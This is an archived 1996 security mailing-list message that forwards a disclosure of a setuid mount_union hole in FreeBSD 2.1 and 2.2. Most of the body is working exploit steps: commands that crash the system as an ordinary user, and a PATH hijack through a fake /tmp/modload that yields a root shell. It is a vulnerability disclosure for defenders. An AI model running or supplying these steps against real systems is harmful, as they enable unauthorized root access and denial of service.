Date: Fri, 17 May 1996 00:47:31 -0700 (PDT) From: invalid opcode <coredump@nervosa.com> To: freebsd-security@freebsd.org Subject: BoS: SECURITY BUG in FreeBSD (fwd) Message-ID: <Pine.BSF.3.91.960517004722.20464B-100000@onyx.nervosa.com>
next in thread | raw e-mail | index | archive | help
hmmmmm == Chris Layne ======================================== Nervosa Computing == == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == ---------- Forwarded message ---------- Date: Fri, 17 May 1996 09:12:13 METDST From: Krzysztof Labanowski <CHRISL@gazeta.pl> To: best-of-security@suburbia.net Subject: BoS: SECURITY BUG in FreeBSD Hi! FreeBSD has a security hole... dangerous is mount_union if suid is set vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT probably FreeBSD 2.1 STABLE is not vulnerable to crash system (as a normal user) try this: mkdir a mkdir b mount_union ~/a ~/b mount_union -b ~/a ~/b to got euid try this: export PATH=/tmp:$PATH #if zsh, of course echo /bin/sh >/tmp/modload chmod +x /tmp/modload mount_union /dir1 /dir2 and You are root! Hole found by Adam Kubicki Best wishes Chris Labanowski KL
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960517004722.20464B-100000>